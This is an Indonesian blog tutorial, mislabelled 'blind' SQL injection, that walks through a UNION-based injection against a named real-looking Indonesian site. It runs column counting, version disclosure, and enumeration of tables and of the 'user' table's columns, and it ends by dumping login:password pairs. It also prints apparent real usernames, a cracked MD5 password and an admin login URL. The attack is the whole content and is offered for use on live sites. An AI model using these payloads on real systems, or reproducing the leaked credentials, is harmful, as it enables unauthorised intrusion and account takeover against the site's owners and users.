Tutorial Blind SQL injection

Tutorial Blind SQL injection
halo temen2 blogger atau bukan blogger,,,kali ini gw mau share tutornya mas vir0e5,,,bukan apa2,,akhir2 ini banyak yang minta tutor,,,meskipun gw gak ngasih tutor dengan sampel web "malaysia",ane bermaksud biar blajar dulu,baru hajar,,,wkwkkw
oya,ini khusus newbie kayak gw yau,,ahh
oke,langsung aja ya,,,udah siap?

*==============================Start========================*
*klik salah satu pesan dari adsensecamp di bawah postingan ini
*anda akan di bawa ke salah satu web hasil klik-an anda
*langsung masuk ke tutor ini
Victim: http://www.bprdinamika.co.id
Vuln : http://www.contohweb.co.id/index.php?part=produklist&action=detail&produk_id=1
Tambah single quote (') setelah angka 1

URL:
http://www.contohweb.co.id/index.php?part=produklist&action=detail&produk_id=1'

Hasilnya:
Fatal error: Call to a member function FetchNextObject() on a non-object in /home/bprdin01/public_html/parts/main/produk_detail.php on line 7

kalau muncul error itu pertanda bahwa website ini vulnerable...

Ternyata ada BUG dan saya coba inject!!

setelah dapet pesan Error tambah perintah ( order by ) untuk mencari column
jika ERROR nya sama kaya yang di atas maka itu yang kita inject!!
http://www.contohweb.co.id/index.php?part=produklist&action=detail&produk_id=1 order by 1--
http://www.contohweb.co.id/index.php?part=produklist&action=detail&produk_id=1 order by 2--
http://www.contohweb.co.id/index.php?part=produklist&action=detail&produk_id=1 order by 3--
http://www.contohweb.co.id/index.php?part=produklist&action=detail&produk_id=1 order by 4--
http://www.contohweb.co.id/index.php?part=produklist&action=detail&produk_id=1 order by 5--
http://www.contohweb.co.id/index.php?part=produklist&action=detail&produk_id=1 order by 6--

Ternyata ada pesan ERROR, ketika di masukan Order by 6-- Kalo tidak ada pesan ERROR , gosok terus, sampe ada pesan ERROR
Berarti kita inject pas “order by 5--”, karena pas “order by 6--“ Terdapat pesan ERROR!!
Kemudian kita lakukan perintah ” UNION SELECT” di akhiri urutan Column dari pertama sampai yang akhir
Dan jangan lupa tambahkan tanda (-) di awal angka parameter tersebut
URL:
http://www.contohweb.co.id/index.php?part=produklist&action=detail&produk_id=-1+UNION+SELECT+1,2,3,4,5--
Nanti disana akan muncul angka…ternyata yang muncul adalah angka 2 , jadi masukan perintah
@@version / version() ,untuk mengetahui versi database mysql si korban

URL:
http://www.contohweb.co.id/index.php?part=produklist&action=detail&produk_id=-1+UNION+SELECT+1,@@version,3,4,5--

Hasilnya:
5.0.90-community-log (dan ini yang akan muncul)
seba
Setelah mengetahui versi dari sql Database tersebut, dilanjutkan dengan mengetahui isi table
--> group_concat(table_name) <-- di tempat hasil versi sql nya --> +from+information_schema.tables+where+table_schema =database()-- <--
di simpan di angka terakhir
http://www.contohweb.co.id/index.php?part=produklist&action=detail&produk_id=-1 union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()--
dan hasilnya agenda,arus,aruskap,bulan,fieldlapo,galeri,kap,kappub,komkon,komkonkap,komkonpub,link,lr,lrkap, lrpub,neraca,neracakap,neracapub,news,produk,strogdetail,strogmain,strogposisi,sukubunga,user, validasi_kap Ada table “user “ kita coba inject table "user" untuk melihat columnnya dengan perintah group_concat(column_name) <-- di tempat hasil versi sql nya atau angka 2 tadi Dan --> +from+information_schema.columns+where+table_name=0xhexa-- <-- perintah ini di simpan setelah angka terakhir 0xhexa artinya masukan hexadecimal;(wajib convert ke hexa agar bisa di baca oleh sql), disana kita akan mengintip 'user' maka di convert menjadi 75736572 di tambah 0x di depannya jadi 0x75736572, untuk convertnya bisa menggunakan bantuan di http://www.swingnote.com/tools/texttohex.php URL: http://www.contohweb.co.id/index.php?part=produklist&action=detail&produk_id=-1 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=0x75736572

Hasilnya: user_id,login,password,last_ip,last_access,login_counter , inject truz sampe dapet login user/admin , kita hanya butuh 'login, password' jadi perintah injectnya --> grup_concat(login,0x3a,password) <-- 0x3a kalo di decode jadi (:) untuk memisahkan antara login dan password kemudian di akhir masukan column tadi yaitu column 'user' --> +from+user-- <-
URL: http://www.contohweb.co.id/index.php?part=produklist&action=detail&produk_id=-1 union select 1,group_concat(login,0x3a,password),3,4,5 from user--

ingat ini cuma contoh ya,,,
user loginnya namanya 'meilyaanied' dan 'bayu'
tapi passwordnya masih berbentuk MD5 belum di crack , crack dulu yach...
f7b79725ce921bfe0b396485b9a0f08b : 1905197927101977 (cracked)
a0a1d0c5f77a7f9e802903b9f8854768 : False (Not cracked)
sekarang cari dech halaman adminnya ...zzZZZZzz.
untuk nyari halaman admin ane rekomendasikan pake r3m1ck admin page finder (karena ane pake itu)wkwkkw

http://www.contohweb.co.id/admin (tinggal masuk..dech!!)
username : meilyaanied
password : 1905197927101977
*==================================Finish=========================*
kalo ada masukan atau pertanyaan,,silahkan posting di bawah

bagi para pengunjung yang berbaik hati kepada kelangsungan blog ini,,,ingat, membantu blog ini tidak merugikan anda,,, harap klik salah satu iklan dibawah

Share this